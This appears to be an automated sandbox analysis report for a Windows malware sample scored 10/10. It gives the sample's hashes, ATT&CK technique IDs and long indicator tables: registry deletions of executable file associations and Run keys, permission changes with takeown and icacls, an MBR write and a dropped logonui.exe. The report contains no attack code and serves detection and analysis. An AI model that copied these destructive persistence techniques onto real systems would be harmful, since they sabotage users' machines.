82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8

General

Target

82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe
Size

602KB
MD5

3acdcdee17825753cacc8dfd414e57d3
SHA1

269fcb1ae5794190e1cecdf96b1eaa41188dc2a6
SHA256

82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8
SHA512

ab700397a9925958914a82d8e02dbbe6e1981980e44dbd982fed3f3d443f6610313e59810e0297ca27542e7b686c9a4340ef8fdb6ec9d24ff5e8437aa4cccd69

Score

10^/10

adware bootkit discovery evasion exploit persistence stealer

Malware Config

Signatures

Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies system executable filetype association 2 TTPs 46 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exetakeown.exeicacls.exeicacls.exe

pid process

4088 takeown.exe
2356 takeown.exe
3032 icacls.exe
2724 icacls.exe
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exeicacls.exeicacls.exe

pid process

4088 takeown.exe
2356 takeown.exe
3032 icacls.exe
2724 icacls.exe

pid	process
4088	takeown.exe
2356	takeown.exe
3032	icacls.exe
2724	icacls.exe

pid	process
4088	takeown.exe
2356	takeown.exe
3032	icacls.exe
2724	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe

Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

description ioc process

File opened for modification \??\PhysicalDrive0 82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe
Drops file in System32 directory 1 IoCs

Processes:

82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

description ioc process

File created C:\WINDOWS\SysWOW64\dllcache\logonui.exe 82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

description	ioc	process
File created	C:\WINDOWS\SysWOW64\dllcache\logonui.exe	82bb1809904786afc0c13abec22a48b320581ec913bf5bbdddd02fce05ef77e8.exe

Drops file in Windows directory 2 IoCs

Processes:

svchost.exeTiWorker.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	reg.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2	reg.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SAFE_BINDTOOBJECT	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\D50177C73771E26F40660CA3C5076D73369AD830	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{33FDA1EA-80DF-11D2-B263-00A0C90D6111}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{78E61E52-0E57-4456-A2F2-517492BCBF8F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{5d08b586-343a-11d0-ad46-00c04fd8fdff}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F4894F79-8121-4DF2-B79E-ED73FA8ADE6F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\ACCESSIBILITY\ALTTEXT	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\AUTOAPPENDIE	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\TabbedBrowsing	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6a.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{7584c670-2274-4efb-b00b-d6aaba6d3850}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{92883667-E95C-443D-AC96-4CACA27BEB6E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CA8A9780-280D-11CF-A24D-444553540000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IMAGING_USE_ART	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\UnattendBackup\SmallCommandBarIcons	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0F1BE7F8-45CA-11D2-831F-00A0244D2298}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{977315A5-C0DB-4EFD-89C2-10AA86CA39A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{77BF5300-1474-4EC7-9980-D32B190E9B07}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm4w.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B75FEF72-0C54-11D2-B14E-00C04FB9358B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6p.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2AF5BD25-90C5-4EEC-88C5-B44DC2905D8B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{37B0353C-A4C8-11D2-B634-00C04F79498E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\TypedURLs	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_REPURPOSEDETECTION	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{9088E688-063A-4806-A3DB-6522712FC061}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{970C7E08-05A7-11D0-89AA-00A0C9054129}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\SSL3.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6e.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\wpc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{73BCFD0F-0DAA-4B21-B709-2A8D9D9C692A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B0A6BAE2-AAF0-11D0-A152-00A0C908DB96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{80CB7887-20DE-11D2-8D5C-00C04FC29D45}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\TLS1.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\UrlTemplate	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Security\DPA	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{108092BF-B7DB-40D1-B7FB-F55922FCC9BE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{22852EE3-B01B-11CF-B826-00A0C9055D9E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{E5E2F8B2-79A4-495C-8581-90BA2C845CC2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop\{F41E8255-3897-4cf4-AEC7-4F85171A0B3C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm66.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6n.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{8FE85D00-4647-40B9-87E4-5EB8A52F4759}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{f5078f29-c551-11d3-89b9-0000f81fe221}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FF2BBC4A-6881-4294-BE0C-17535B1FCCFA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{C451C08A-EC37-45DF-AAAD-18B51AB5E837}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm79.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Migration	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{69C462E1-CD41-49E3-9EC2-D305155718C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C3DFA998-A486-11d4-AA25-00C04F72DAEB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1C15D484-911D-11D2-B632-00C04F79498E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{8C63DABA-CBA8-4B5D-A0F7-AE00F2920929}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{5DFB2651-9668-11D0-B17B-00C04FC2A0CA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{f5078f21-c551-11d3-89b9-0000f81fe221}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{989F13EE-B25B-4FAB-9AED-C4336C8CCF0C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm49.dll	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0D080D7D-28D2-4F86-BFA1-D582E5CE4867}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1D95A7C7-3282-4DB7-9A48-7C39CE152A19}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{8290CB76-9F61-458B-AD2C-3F6FD2E8CD7D}	reg.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
